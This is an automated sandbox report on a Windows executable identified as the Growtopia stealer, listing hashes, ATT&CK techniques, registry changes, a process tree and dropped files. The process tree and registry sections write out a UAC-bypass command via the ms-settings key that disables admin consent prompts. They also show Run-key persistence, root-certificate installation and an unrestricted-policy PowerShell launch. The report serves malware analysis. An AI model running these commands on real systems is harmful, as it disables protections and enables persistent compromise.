growtopia | 44d150b890d0d9440e430d47f2b5aeb2c6b5148bbe8cfabf83dcb4f89abdef2e

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
04-04-2024 04:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe
Size

426KB
MD5

af382cfb9632dde6f7de3f2d0a76e103
SHA1

2ace18dcd993145b4367dbb13cc1b5e99c3eeaf0
SHA256

44d150b890d0d9440e430d47f2b5aeb2c6b5148bbe8cfabf83dcb4f89abdef2e
SHA512

4987935c732c974760b0de0d54bdef75ce0a75cf88d698e3014b974828f2d370576aa7dd79ac661f14141fd36b41e844f581a9808ea2f6eabfbc3ab5b7fba0cf
SSDEEP

6144:tYvr7D1PE/3BcL9l5bUsgFxvJqBIeAZtvHLPKKzAI17JY0H+kK1e:tGPD549FRaSkT1e

Score

10^/10

growtopia persistence spyware stealer

Malware Config

Signatures

Growtopia
Growtopa is an opensource modular stealer written in C#.
stealer growtopia
Executes dropped EXE 1 IoCs

Processes:

Exafarm Loader.exe

pid process

2912 Exafarm Loader.exe
Loads dropped DLL 3 IoCs

Processes:

WerFault.exe

pid process

1836 WerFault.exe
1836 WerFault.exe
1836 WerFault.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2912	Exafarm Loader.exe

pid	process
1836	WerFault.exe
1836	WerFault.exe
1836	WerFault.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Exafarm Loader.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Exafarm Loader = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exafarm Loader"	Exafarm Loader.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 icanhazip.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1836 2912 WerFault.exe Exafarm Loader.exe

flow	ioc
10	icanhazip.com

pid	pid_target	process	target process
1836	2912	WerFault.exe	Exafarm Loader.exe

Modifies registry class 7 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\system32\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Exafarm Loader.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Exafarm Loader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Exafarm Loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Exafarm Loader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Exafarm Loader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Exafarm Loader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Exafarm Loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	Exafarm Loader.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2664 powershell.exe
2148 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2664 powershell.exe
Token: SeDebugPrivilege 2148 powershell.exe

pid	process
2664	powershell.exe
2148	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exeExafarm Loader.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2852 wrote to memory of 2912	2852	af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe	Exafarm Loader.exe
PID 2852 wrote to memory of 2912	2852	af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe	Exafarm Loader.exe
PID 2852 wrote to memory of 2912	2852	af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe	Exafarm Loader.exe
PID 2852 wrote to memory of 2912	2852	af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe	Exafarm Loader.exe
PID 2912 wrote to memory of 2464	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2464	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2464	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2464	2912	Exafarm Loader.exe	cmd.exe
PID 2464 wrote to memory of 2516	2464	cmd.exe	reg.exe
PID 2464 wrote to memory of 2516	2464	cmd.exe	reg.exe
PID 2464 wrote to memory of 2516	2464	cmd.exe	reg.exe
PID 2464 wrote to memory of 2536	2464	cmd.exe	reg.exe
PID 2464 wrote to memory of 2536	2464	cmd.exe	reg.exe
PID 2464 wrote to memory of 2536	2464	cmd.exe	reg.exe
PID 2912 wrote to memory of 1064	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1064	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1064	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1064	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1892	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1892	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1892	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1892	2912	Exafarm Loader.exe	cmd.exe
PID 1892 wrote to memory of 2664	1892	cmd.exe	powershell.exe
PID 1892 wrote to memory of 2664	1892	cmd.exe	powershell.exe
PID 1892 wrote to memory of 2664	1892	cmd.exe	powershell.exe
PID 2912 wrote to memory of 1764	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1764	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1764	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1764	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1116	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1116	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1116	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1116	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2412	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2412	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2412	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2412	2912	Exafarm Loader.exe	cmd.exe
PID 2412 wrote to memory of 2148	2412	cmd.exe	powershell.exe
PID 2412 wrote to memory of 2148	2412	cmd.exe	powershell.exe
PID 2412 wrote to memory of 2148	2412	cmd.exe	powershell.exe
PID 2912 wrote to memory of 2784	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2784	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2784	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 2784	2912	Exafarm Loader.exe	cmd.exe
PID 2912 wrote to memory of 1836	2912	Exafarm Loader.exe	WerFault.exe
PID 2912 wrote to memory of 1836	2912	Exafarm Loader.exe	WerFault.exe
PID 2912 wrote to memory of 1836	2912	Exafarm Loader.exe	WerFault.exe
PID 2912 wrote to memory of 1836	2912	Exafarm Loader.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2852
- C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\UAC.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2464
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
      4⤵
      Modifies registry class
      PID:2516
  - - C:\Windows\system32\reg.exe
      REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
      4⤵
      Modifies registry class
      PID:2536
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DC.exe" /D
    3⤵
    PID:1064
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MAC.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell get-NetAdapter
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2664
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\GenReg.exe" [29549]--[140496283]--[14774,14774c,14774w,14774wc]--[105372212,105372212c]
    3⤵
    PID:1764
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WBPVBat.bat"
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    cmd.exe /c Powershell.exe -NoProfile -ExecutionPolicy unrestricted -file "C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell.exe -NoProfile -ExecutionPolicy unrestricted -file "C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2148
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ScanPC.bat"
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1512
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe

Filesize
151KB

MD5
a5649742d25bd68b1db70b70b3012d50

SHA1
469f0f58b70db096c8e0ecc30252d26fe274ff76

SHA256
f2adef7d44afd81ae29ff66853f7db11c5959d22439cd623291638dc657fca38

SHA512
b5db014aab517a28959562bde768c375805cdff9a1f241460da849e0637dfafe88d4c7dc9129e7c63b651a3a8bbd6b9721d47c8a53182f1151893f419aac0a71

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAC.bat

Filesize
42B

MD5
56120ea7d97e691243935b98d32f4b65

SHA1
f89f6249a946882410de06765ec07e11f2608177

SHA256
1d6a29ec8b4f624b3246450c2a34ae1a8b3e35cdc7f3fa86a680e14169e01a67

SHA512
4cda70d6283fc48105a64c157c50fbe61bc5c77aa0f28e8c1176943cfdfa4345df77f09573d49ff896830cfc8315547a453a7bcbe68c00dd140b99ead94c8b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAC.zb

Filesize
423B

MD5
dfd4ca0036d729b95ec5a67081801628

SHA1
d213288411a38c9b60b606321e5617180805a7c3

SHA256
663431f49b93a7cc72370896bb20920edae4764b1fac6da2c31717c0ebdfd1e4

SHA512
c844edabab2dac76b0ee6f3203dca97a9009443df3466621616e2536570c1be04177e5080d83330440d2e4b6b58de604d93f040fb49cd109e4849fcc383a5316

Download Submit
C:\Users\Admin\AppData\Local\Temp\ScanPC.bat

Filesize
65B

MD5
fe76c9e647f358368eaf4e222e204dc6

SHA1
c94ea01f006620f2adedf56a377ad452b30be98a

SHA256
46aa77e7b80cab973f35033380be8dd8924bc7a5f43990037359809baf628244

SHA512
fd1b4fe5bc64813614a847d9552d4e29a9ec9957f4e7a94176d65298293412213f0255400bf55d188a4a159575d611a072fce999e2253adf0be8f382af977daa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4CD0.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\UAC.bat

Filesize
351B

MD5
84e809c3854f97339e11bb74129f69d1

SHA1
